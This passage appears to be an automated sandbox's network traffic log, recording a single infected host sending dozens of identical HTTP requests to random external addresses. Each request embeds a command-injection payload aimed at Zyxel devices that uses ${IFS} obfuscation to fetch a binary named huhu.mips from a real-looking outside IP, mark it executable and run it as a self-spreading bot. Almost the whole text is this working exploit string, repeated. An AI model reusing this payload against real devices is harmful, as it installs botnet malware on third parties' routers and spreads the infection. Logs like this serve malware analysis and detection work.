                                      Jan 19, 2024 17:29:35.836114883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5113192.168.2.145555063.50.95.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836148024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5114192.168.2.1441050188.212.152.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836188078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5115192.168.2.143521263.52.41.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836225033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5116192.168.2.1450860109.215.208.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836278915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5117192.168.2.1441304192.152.124.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836317062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5118192.168.2.1458066118.123.220.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836359024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5119192.168.2.144815893.253.146.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836397886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5120192.168.2.1459764106.141.116.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836441040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5121192.168.2.1437050123.66.24.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836481094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5122192.168.2.1442114154.198.188.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836525917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5123192.168.2.1445808164.180.177.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836558104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5124192.168.2.143291227.215.187.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836610079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5125192.168.2.1434804158.212.80.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836718082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5126192.168.2.1441988168.9.192.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836740971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5127192.168.2.1442022189.84.210.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836771011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5128192.168.2.144384060.181.215.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836811066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5129192.168.2.143735875.173.160.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836873055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5130192.168.2.144708490.89.193.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836896896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5131192.168.2.1457480181.192.95.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836942911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5132192.168.2.1449418160.35.66.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.836977005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5133192.168.2.145463254.251.73.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837008953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5134192.168.2.1441006186.245.11.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837063074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5135192.168.2.1457078198.78.33.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837088108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5136192.168.2.14467385.149.115.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837093115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5137192.168.2.145769239.183.115.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837138891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5138192.168.2.1436120171.22.8.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837186098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5139192.168.2.144971425.7.71.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837212086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5140192.168.2.144812447.242.59.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837248087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5141192.168.2.145776086.92.194.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837294102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5142192.168.2.14501049.77.213.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837313890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5143192.168.2.14387129.133.54.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837368965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5144192.168.2.1447028119.195.101.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837414026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5145192.168.2.1442038196.205.240.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837455034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5146192.168.2.1451704122.51.22.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837496042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5147192.168.2.1460446222.236.177.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837512016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5148192.168.2.145777485.215.78.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837579966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5149192.168.2.1444470134.81.32.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837613106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5150192.168.2.1451550122.89.250.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837649107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5151192.168.2.1444838152.187.107.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837678909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5152192.168.2.145807054.188.254.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837737083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5153192.168.2.145909444.127.139.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837764978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5154192.168.2.14426801.222.208.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837798119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5155192.168.2.1433798179.84.107.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837846994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5156192.168.2.144389636.202.250.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837873936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5157192.168.2.1433296155.245.176.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837934017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5158192.168.2.143731087.251.125.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.837946892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5159192.168.2.1437736135.48.159.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838021040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5160192.168.2.1456452143.89.226.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838051081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5161192.168.2.145904259.10.220.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838099003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5162192.168.2.1435106189.112.125.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838152885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5163192.168.2.1446006162.132.30.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838186979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5164192.168.2.145751651.224.49.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838217020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5165192.168.2.1444262124.8.212.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838280916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5166192.168.2.1441750190.251.201.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838298082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5167192.168.2.1449128163.141.127.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838351011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5168192.168.2.1457710180.7.172.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838367939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5169192.168.2.145641470.88.11.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838419914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5170192.168.2.145693481.122.162.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838454008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5171192.168.2.1453828126.175.231.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838490963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5172192.168.2.1459158200.116.75.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838538885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5173192.168.2.1439584103.127.5.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838566065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5174192.168.2.1448406204.112.255.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838618994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5175192.168.2.1458684145.116.67.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.838658094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5176192.168.2.1460474180.42.255.94443
                                      TimestampBytes transferredDirectionData
